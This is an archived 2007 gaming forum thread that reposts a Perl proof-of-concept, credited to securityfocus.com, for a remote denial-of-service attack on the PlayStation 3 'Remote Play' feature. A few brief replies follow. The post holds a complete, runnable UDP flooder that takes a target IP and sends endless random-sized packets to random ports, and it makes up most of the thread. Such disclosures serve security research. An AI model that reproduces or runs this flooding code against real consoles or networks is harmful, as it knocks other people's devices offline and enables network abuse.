xboxscene.org forums

Author Topic: Playstation 3 'Remote Play' Remote DoS Exploit  (Read 82 times)

PS3Scene

  • Archived User
  • Hero Member
  • *
  • Posts: 832
Playstation 3 'Remote Play' Remote DoS Exploit
« on: March 26, 2007, 04:17:00 PM »

Playstation 3 'Remote Play' Remote DoS Exploit
Posted by XanTium | 26-3-2007 16:41 EST

 
From securityfocus.com:
Quote

#!/usr/bin/perl

####.:Playstation 3 "Remote Play" Remote DoS Exploit:.####
#
# A UDP flood while the "remote play" feature is active
# will result in a denial of service condition.
#
# Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A
#
# -Dark_K
#
# POC code is based on odix's perl udp flooder
##########################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=1) {
printf "usage: ./ps3rpdos.pl \n";
exit(1);
}

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ARGV[0]");

printf "Sending...\n";

for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

News-Source: securityfocus.com

Logged

ConteZero76

  • Archived User
  • Full Member
  • *
  • Posts: 244
Playstation 3 'Remote Play' Remote DoS Exploit
« Reply #1 on: March 26, 2007, 04:55:00 PM »

Remote DoS exploit only means that you can make a console not responding.
Nothing more.
Logged

lando786

  • Archived User
  • Jr. Member
  • *
  • Posts: 56
Playstation 3 'Remote Play' Remote DoS Exploit
« Reply #2 on: March 26, 2007, 07:05:00 PM »

ohh guess that sucks sleeping.gif
Logged

zerosignal0

  • Archived User
  • Jr. Member
  • *
  • Posts: 51
Playstation 3 'Remote Play' Remote DoS Exploit
« Reply #3 on: April 20, 2007, 01:20:00 PM »

short and sweet perl sploit! Too bad no one knows what the hell a perl script even is on this site.
Logged